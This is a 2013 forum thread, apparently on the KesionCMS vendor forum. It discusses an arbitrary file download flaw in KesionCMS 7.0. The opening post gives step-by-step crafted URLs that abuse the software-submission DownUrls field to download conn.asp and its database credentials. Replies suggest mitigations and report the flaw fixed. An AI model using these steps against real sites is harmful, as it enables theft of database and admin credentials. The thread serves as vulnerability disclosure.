账号通
    

账号  

密码  

3629

查看

3

回复
主题:[讨论]kesioncms7.0, 最新版本任意下载漏洞 [收藏主题] 转到:  
zhan456 当前离线

2

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:3 分
登录次数:1 次
注册时间:2013/5/16
最后登录:2013/5/16
zhan456 发表于:2013/5/16 15:26:37   | 只看该作者 查看该作者主题 楼主 
漏洞检测方法:
先注册个用户登陆,然后访问http://www.xxx.net/user/Contributor.asp 可以看到几个可以投稿的分类,选择个软件投稿.点下一步!



然后会跳到:xxx.com/user/User_MySoftWare.asp?action=Add&channelid=3&ClassID=20102479005271(这个ClassID不同的站可能会不一样)

然后在把地址输入:xxx.com/user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID=20102479005271(上面的ClassID)&Title=aa&DownUrls=/admin63.net.asp(要下载的文件路径。)

输入好后就会发布一个标题为aa的软件投稿可以在xxx.com/user/User_ItemInfo.asp?ChannelID=3 看到 发布的投稿。
打开发布的aa投稿,然后会出现下载截面直接点下载就可以下载到conn.asp这个文件了,一般数据库地址,或者mssql 数据帐户 后台安全码等等 都会记录在里面!


由于时间晚了,我就随便说下咯,大概利用就是刚才我说的那样,漏洞放手里半年了,有兴趣的可以去研究下
 
  支持(1) | 反对(1) 回到顶部顶端 回到底部底部
hejian 当前离线

1201

主题

4

广播

4

粉丝
添加关注
级别:九年级

用户积分:3522 分
登录次数:563 次
注册时间:2006/12/26
最后登录:2024/1/21
hejian 发表于:2013/5/16 16:32:17   | 只看该作者 查看该作者主题 沙发 
做在线知识付费 选科汛云开店
恐怖!官方得注意了!
 
  支持(0) | 反对(1) 回到顶部顶端 回到底部底部
dongshuntao 当前离线

122

主题

0

广播

2

粉丝
添加关注
级别:一年级

用户积分:767 分
登录次数:196 次
注册时间:2007/12/19
最后登录:2024/12/15
dongshuntao 发表于:2013/11/6 16:58:30   | 只看该作者 查看该作者主题 藤椅 
科汛在线商城系统(NET)
如果关闭了下载模型的投稿权限,应该就没事吧!或者不需要会员注册的,干脆禁用会员功能。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
ygr1971 当前离线

1404

主题

44

广播

45

粉丝
添加关注
级别:版主

用户积分:8683 分
登录次数:124 次
注册时间:2011/11/13
最后登录:2021/11/2
ygr1971 发表于:2013/11/6 17:31:16   | 只看该作者 查看该作者主题 板凳 
科汛智能建站系统
最新版已经修复。官方的置顶帖有说明。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.47070秒 powered by KesionCMS 9.0